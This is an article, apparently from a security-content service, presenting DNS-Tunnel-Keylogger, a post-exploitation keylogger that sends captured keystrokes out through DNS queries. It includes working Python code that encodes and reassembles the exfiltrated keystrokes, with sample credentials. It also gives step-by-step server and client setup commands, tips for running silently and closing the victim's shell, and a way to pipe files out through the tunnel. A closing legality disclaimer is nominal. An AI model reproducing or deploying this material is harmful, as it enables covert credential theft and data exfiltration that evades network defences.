DNS Tunnel Keylogger – An Offensive Post-Exploitation Tool For Pentesters

A new keylogger, made up of a server and a client, has been released on GitHub for pentesters. It uses DNS tunneling to carry keystrokes out through firewalls, so the traffic blends in with ordinary DNS and may evade detection.

The tool, DNS-Tunnel-Keylogger, is designed for post-exploitation use by pentesters and emphasizes lightweight exfiltration and persistence in order to reduce the chances of being discovered by security controls.


The server component of the tool is written in Python 3 and requires the installation of dependencies via pip.

It listens by default on UDP port 53; a different port can be specified with the -p flag. The server’s IP address is placed in the SOA and NS records it serves, so that other nameservers can locate it.

Users are instructed to set the domain’s nameservers (at the registrar) to custom nameservers pointing at the exfiltration server’s IP address, in effect creating glue records, so that recursive resolvers forward every query for that domain to the server.

DNS tunneling is a technique for encoding the data of other programs or protocols inside DNS queries and responses.

This is particularly useful for post-exploitation data extraction because outbound DNS is almost always permitted through firewalls, which lets the traffic bypass egress restrictions and avoid casual detection.

Prerequisites:

  • Knowledge of DNS and networking concepts
  • Familiarity with Python and Bash scripting
  • A Linux environment for the keylogger client
  • Python 3 installed on the server

On the client side, the Linux keylogger consists of two Bash scripts: connection.sh sends the captured keystrokes to the server, and logger.sh starts the keylogging process.

The keylogger can be started silently, and the launching shell can be closed when it exits, so that the user is never dropped back into a shell that is not being logged.


The developers note that the keylogger will not run in non-interactive shells, and that the Windows Dns_Query_A function tends to send duplicate requests; the server handles this by discarding repeated packets.
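To make the tunneling and duplicate-handling described above concrete, here is an added example in Python. It is not the project’s own code and does not reproduce its wire format: it assumes a zone named exfil.example.com, a 2-byte sequence-number header and base32-encoded labels. The client half chunks captured bytes into query names, and the server half reassembles them, drops byte-identical repeat queries of the kind the Dns_Query_A note refers to, and reports any sequence numbers that never arrived.

```python
"""Added example (not the DNS-Tunnel-Keylogger project's code).

Shows the two halves of a DNS tunnel: a client that chunks captured bytes into
query names under a domain the operator controls, and a server that reassembles
them and drops the duplicate queries that retrying resolvers (the Windows
Dns_Query_A behaviour mentioned in the article) produce. The wire format used
here (2-byte sequence number + base32 labels) is an assumption for illustration,
not the project's actual format.
"""
import base64
import struct

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical upper bound on a full presentation-format name
DOMAIN = "exfil.example.com"   # assumption: zone the server is authoritative for


def encode_chunks(data: bytes, domain: str = DOMAIN, chunk_size: int = 30) -> list:
    """Split data into sequence-numbered chunks, one DNS query name per chunk.

    Base32 rather than base64: DNS names are case-insensitive and resolvers may
    randomise case (0x20 encoding), which would corrupt a mixed-case alphabet.
    """
    names = []
    for seq, off in enumerate(range(0, len(data), chunk_size)):
        payload = struct.pack(">H", seq) + data[off:off + chunk_size]
        b32 = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join(labels + [domain])
        if len(name) > MAX_NAME:
            raise ValueError("chunk_size too large for a single query name")
        names.append(name)
    return names


class TunnelReceiver:
    """Server side: decode chunks from query names and suppress duplicates.

    A retried query is byte-for-byte identical to the original, so the
    normalised query name itself is a sufficient deduplication key.
    """

    def __init__(self, domain: str = DOMAIN):
        self.suffix = "." + domain.lower()
        self.seen = set()
        self.chunks = {}
        self.duplicates = 0

    def handle_query(self, qname: str) -> bool:
        """Return True if the query carried a new chunk, False otherwise."""
        qname = qname.lower().rstrip(".")
        if not qname.endswith(self.suffix):
            return False                    # not our zone, ignore
        if qname in self.seen:
            self.duplicates += 1            # Dns_Query_A-style repeat
            return False
        self.seen.add(qname)
        b32 = qname[: -len(self.suffix)].replace(".", "")
        b32 += "=" * (-len(b32) % 8)        # restore the padding the client stripped
        raw = base64.b32decode(b32.upper())
        seq = struct.unpack(">H", raw[:2])[0]
        self.chunks[seq] = raw[2:]
        return True

    def missing(self) -> list:
        """Sequence numbers never received (UDP gives no delivery guarantee)."""
        if not self.chunks:
            return []
        return [s for s in range(max(self.chunks) + 1) if s not in self.chunks]

    def reassemble(self) -> bytes:
        return b"".join(self.chunks[s] for s in sorted(self.chunks))


def demo() -> tuple:
    """Round-trip constructed keystrokes with every query delivered twice."""
    keystrokes = b"root:hunter2\n" * 5          # constructed sample input
    names = encode_chunks(keystrokes)
    rx = TunnelReceiver()
    for name in names:
        rx.handle_query(name)
        rx.handle_query(name)                    # simulate the duplicate send
    return rx.reassemble(), rx.duplicates, len(names), rx.missing()


if __name__ == "__main__":
    data, dups, n, gaps = demo()
    print(f"{n} queries, {dups} duplicates dropped, {len(gaps)} gaps")
    print(data.decode())
```

Two points worth noting from the code: the sequence number is what makes deduplication safe, because the same keystrokes typed twice still produce distinct query names, and the missing() check matters because UDP queries can be lost, so a server that simply concatenates whatever arrives will silently produce corrupted output.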

DNS Tunnel Keylogger – Server Setup

Step 1: Clone the Repository

First, you need to clone the DNS-Tunnel-Keylogger repository from GitHub:

git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git

Step 2: Install Dependencies

Navigate to the cloned directory and install the required Python dependencies:

cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt

Step 3: Start the Server

To start the server, use the following command:

python3 main.py <ip> <domain>

Replace <ip> with the IP address of the server and <domain> with the domain that the server is authoritative for.

Server Options:

  • -h, --help: Show the help message and exit.
  • -p PORT, --port PORT: Specify a different port to listen on. By default, the server listens on UDP port 53.

Client Setup (Linux Keylogger)

Step 1: Prepare the Scripts

Ensure that logger.sh and connection.sh are in the same directory. These scripts will capture and send the keystrokes to the server.

Step 2: Start the Keylogger

To start the keylogger, execute the following command:

./logger.sh <domain> && exit

Replace <domain> with the domain to send data to. The trailing && exit closes the shell when the logger exits, so the user is not returned to a shell that is no longer being logged.

Keylogger Options:

  • -p path: Specify the path to the log file to listen to. By default, this is /tmp/.
  • -l: Run the logger with warnings and errors printed, which can be useful for debugging.

Additional Information

Manual Data Transmission

To send data manually, such as a file, pipe it into the connection.sh script, which opens the tunnel and transmits the data.

Security Considerations

If used without proper authorization, a keylogger and DNS tunneling can be considered malicious and illegal in many jurisdictions. Ensure you can use these tools in your environment and comply with all relevant laws and ethical guidelines.

Troubleshooting

  • If the logger was started with its output redirected (&> /dev/null) to run silently, remove the redirection to see error messages, or run it with the -l flag.
  • Check the server’s firewall: inbound UDP on the DNS port (default 53) must be allowed so that queries reach the server and its replies can be returned.
  • Verify that the domain is correctly delegated and that the server is authoritative for it, for example by running dig +trace <domain> from outside the network and confirming that the delegation ends at the server’s IP address.

This guide provides the steps to set up a DNS tunneling keylogger for covert keystroke exfiltration. Remember to use this tool responsibly and within the law.


Work done by a Team Of Security Experts from Cyber Writes (www.cyberwrites.com) - World’s First Dedicated Content-as-a-Service (CaaS) Platform for Cybersecurity. For Exclusive Cyber Security Contents, Reach at: [email protected]